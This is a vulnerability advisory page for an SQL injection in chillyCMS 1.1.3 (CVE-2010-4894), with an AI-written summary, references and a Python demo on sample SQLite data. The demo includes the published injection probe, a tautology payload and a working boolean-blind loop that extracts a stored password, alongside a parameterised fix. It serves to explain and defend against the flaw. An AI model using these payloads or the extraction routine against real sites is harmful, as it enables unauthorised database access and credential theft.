CVE-2010-4894
Description
SQL injection vulnerability in core/showsite.php in chillyCMS 1.1.3 allows remote attackers to execute arbitrary SQL commands via the name parameter. NOTE: some of these details are obtained from third party information.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
SQL injection in chillyCMS 1.1.3 via the name parameter in core/showsite.php allows remote attackers to execute arbitrary SQL commands.
Vulnerability
chillyCMS 1.1.3 contains a SQL injection vulnerability in core/showsite.php: the name parameter is used in a SQL query without proper sanitization or parameter binding, so an attacker controls part of the query text and can inject arbitrary SQL. The flaw was present in the latest release available at the time of disclosure [1][2].
Exploitation
An attacker can exploit this vulnerability remotely, without authentication, by sending a crafted HTTP request to core/showsite.php with a malicious name parameter. The injection vector uses a single quote and a closing parenthesis to terminate the quoted, parenthesised value the script places in its query; the published probe ') or 1=(' illustrates that break-out. Because the page's response differs depending on whether the injected condition is true, boolean-based blind SQL injection can be used to extract database contents one character at a time [2].
Impact
Successful exploitation allows an attacker to execute arbitrary SQL commands against the underlying database. This can lead to unauthorized access to sensitive data, such as user credentials, and potentially full compromise of the application. The attacker gains the ability to read, modify, or delete database contents [2].
Mitigation
At the time the vulnerability was published, no official fix was available from the vendor. A later release may have been published on the vendor's website (frozenpepper.de); users should check there and upgrade to a fixed version if one exists. Where no fix exists, the effective remediation is to rewrite the query in core/showsite.php to use a prepared statement with bound parameters; input validation (for example, restricting name to the character set a site name can legitimately contain) is defence in depth, not a substitute. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog [1][2].
AI Insight generated on May 24, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
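The break-out, the blind extraction and the parameterised fix described in the Exploitation and Mitigation sections, as an added example that is not part of the advisory, the references, or chillyCMS's own code. It models the showsite.php lookup in Python on an in-memory SQLite database. The query shape (a parenthesised string equality on a name column), the table and column names, and every row are assumptions chosen so that the published probe ') or 1=(' is exactly what breaks out of the value; the demo completes that skeleton into a tautology, because whether 1=('') evaluates true depends on the DBMS's string-to-number coercion and in SQLite (and MySQL) it does not.

```python
import sqlite3
import string

# Assumption, not from the advisory: the lookup in core/showsite.php is modelled
# as a parenthesised string equality on a "name" column, which is the query shape
# the published probe  ') or 1=('  is built to break out of. Table and column
# names and all rows below are constructed sample data, not chillyCMS's schema.
VULN_SQL = "SELECT id, name FROM sites WHERE (name = '{name}')"


def build_db():
    """Create an in-memory database populated with constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE sites (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO sites (name) VALUES (?)",
                     [("home",), ("about",), ("contact",)])
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, login TEXT, pw TEXT)")
    conn.execute("INSERT INTO users (login, pw) VALUES ('admin', 's3cret')")
    conn.commit()
    return conn


def render_vulnerable_sql(name):
    """Return the SQL text the vulnerable code would actually send to the database."""
    return VULN_SQL.format(name=name)


def showsite_vulnerable(conn, name):
    """Vulnerable lookup: the request parameter is spliced into the SQL text."""
    return conn.execute(render_vulnerable_sql(name)).fetchall()


def showsite_fixed(conn, name):
    """Fixed lookup: the parameter is bound as data, so quotes and parentheses
    inside it can never change the statement."""
    return conn.execute("SELECT id, name FROM sites WHERE (name = ?)", (name,)).fetchall()


def blind_extract(conn, target_sql, max_len=32):
    """Boolean-based blind extraction through the vulnerable lookup.

    Each probe asks whether character `pos` of the target value equals `ch`;
    the page either lists rows (condition true) or lists none (false). The
    trailing  and ('1' = '1  keeps the parenthesis and quote that the original
    query appends balanced.
    """
    alphabet = string.ascii_letters + string.digits + string.punctuation
    recovered = ""
    for pos in range(1, max_len + 1):
        hit = None
        for ch in alphabet:
            lit = ch.replace("'", "''")          # escape so the probe itself stays valid SQL
            probe = (f"') or (substr(({target_sql}), {pos}, 1) = '{lit}') "
                     f"and ('1' = '1")
            if showsite_vulnerable(conn, probe):
                hit = ch
                break
        if hit is None:                          # substr() past the end matches nothing
            break
        recovered += hit
    return recovered


if __name__ == "__main__":
    db = build_db()
    tautology = "') or ('1' = '1"                 # completes the published break-out
    print(render_vulnerable_sql(tautology))
    print("vulnerable:", showsite_vulnerable(db, tautology))   # every row
    print("fixed:     ", showsite_fixed(db, tautology))        # no row
    print("leaked pw: ", blind_extract(db, "SELECT pw FROM users LIMIT 1"))
```

Against the vulnerable lookup the tautology returns every site and the blind loop recovers the constructed password one character per probe; the same inputs passed to the bound-parameter version match nothing, because the whole string is compared as a name rather than parsed as SQL.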
Affected products
Patches
No patches discovered yet.
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References
- secunia.com/advisories/41313 (nvd; Vendor Advisory)
- osvdb.org/67836 (nvd)
- packetstormsecurity.org/1009-exploits/chillycms-sqlxss.txt (nvd)
- securityreason.com/securityalert/8437 (nvd)
- www.bugreport.ir/index_73.htm (nvd)
- www.exploit-db.com/exploits/14897 (nvd)
- www.securityfocus.com/bid/42991 (nvd)
- www.vupen.com/english/advisories/2010/2298 (nvd)
- exchange.xforce.ibmcloud.com/vulnerabilities/61606 (nvd)
News mentions
No linked articles in our index yet.